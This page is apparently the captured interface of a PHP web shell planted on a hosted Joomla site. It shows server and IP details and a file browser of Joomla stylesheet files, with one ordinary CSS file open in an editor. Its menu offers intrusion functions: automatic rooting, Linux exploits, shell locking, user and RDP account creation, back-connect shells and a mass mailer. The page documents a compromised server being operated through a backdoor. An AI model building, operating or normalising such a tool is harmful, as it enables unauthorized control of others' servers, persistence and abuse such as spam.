Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
genieprevention /
media /
jui /
less /
[ HOME SHELL ]
Name
Size
Permission
Action
accordion.less
636
B
-rw-r--r--
alerts.less
1.36
KB
-rw-r--r--
bootstrap-extended.less
9.77
KB
-rw-r--r--
bootstrap-rtl.less
12.49
KB
-rw-r--r--
bootstrap.less
1.67
KB
-rw-r--r--
breadcrumbs.less
431
B
-rw-r--r--
button-groups.less
5.58
KB
-rw-r--r--
buttons.less
4.65
KB
-rw-r--r--
carousel.less
2.42
KB
-rw-r--r--
close.less
901
B
-rw-r--r--
code.less
1.25
KB
-rw-r--r--
component-animations.less
306
B
-rw-r--r--
dropdowns.less
5.91
KB
-rw-r--r--
forms.less
16.04
KB
-rw-r--r--
grid.less
429
B
-rw-r--r--
hero-unit.less
521
B
-rw-r--r--
icomoon.less
11.93
KB
-rw-r--r--
labels-badges.less
1.84
KB
-rw-r--r--
layouts.less
329
B
-rw-r--r--
media.less
860
B
-rw-r--r--
mixins.less
22.83
KB
-rw-r--r--
modals.joomla.less
1.59
KB
-rw-r--r--
modals.less
1.59
KB
-rw-r--r--
navbar.less
11.81
KB
-rw-r--r--
navs.less
7.97
KB
-rw-r--r--
pager.less
760
B
-rw-r--r--
pagination.less
2.62
KB
-rw-r--r--
popovers.less
3
KB
-rw-r--r--
progress-bars.less
2.79
KB
-rw-r--r--
reset.less
4.12
KB
-rw-r--r--
responsive-1200px-min.less
565
B
-rw-r--r--
responsive-767px-max.joomla.le...
705
B
-rw-r--r--
responsive-767px-max.less
4.09
KB
-rw-r--r--
responsive-768px-979px.less
463
B
-rw-r--r--
responsive-navbar.less
4.23
KB
-rw-r--r--
responsive-utilities.less
1.56
KB
-rw-r--r--
responsive.less
1.04
KB
-rw-r--r--
scaffolding.less
885
B
-rw-r--r--
sprites.less
10.58
KB
-rw-r--r--
tables.less
6.26
KB
-rw-r--r--
thumbnails.less
1.16
KB
-rw-r--r--
tooltip.less
1.64
KB
-rw-r--r--
type.less
4.74
KB
-rw-r--r--
utilities.less
335
B
-rw-r--r--
variables.less
8.93
KB
-rw-r--r--
wells.less
552
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : modals.less
// // Modals // -------------------------------------------------- // Background .modal-backdrop { position: fixed; top: 0; right: 0; bottom: 0; left: 0; z-index: @zindexModalBackdrop; background-color: @black; // Fade for backdrop &.fade { opacity: 0; } } .modal-backdrop, .modal-backdrop.fade.in { .opacity(80); } // Base modal // > Joomla JUI // .modal REMOVED // < Joomla JUI .modal-header { padding: 9px 15px; border-bottom: 1px solid #eee; // Close icon .close { margin-top: 2px; } // Heading h3 { margin: 0; line-height: 30px; } } // Body (where all modal content resides) .modal-body { width: 98%; position: relative; max-height: 400px; padding: 1%; } // Remove border and scrollbar from iframe modal .modal-body iframe { width: 100%; max-height: none; border: 0 !important; } // Remove bottom margin if need be .modal-form { margin-bottom: 0; } // Footer (for actions) .modal-footer { padding: 14px 15px 15px; margin-bottom: 0; text-align: right; // right align buttons background-color: #f5f5f5; border-top: 1px solid #ddd; .border-radius(0 0 6px 6px); .box-shadow(inset 0 1px 0 @white); .clearfix(); // clear it in case folks use .pull-* classes on buttons // Properly space out buttons .btn + .btn { margin-left: 5px; margin-bottom: 0; // account for input[type="submit"] which gets the bottom margin like all other inputs } // but override that for button groups .btn-group .btn + .btn { margin-left: -1px; } // and override it for block buttons as well .btn-block + .btn-block { margin-left: 0; } }
Close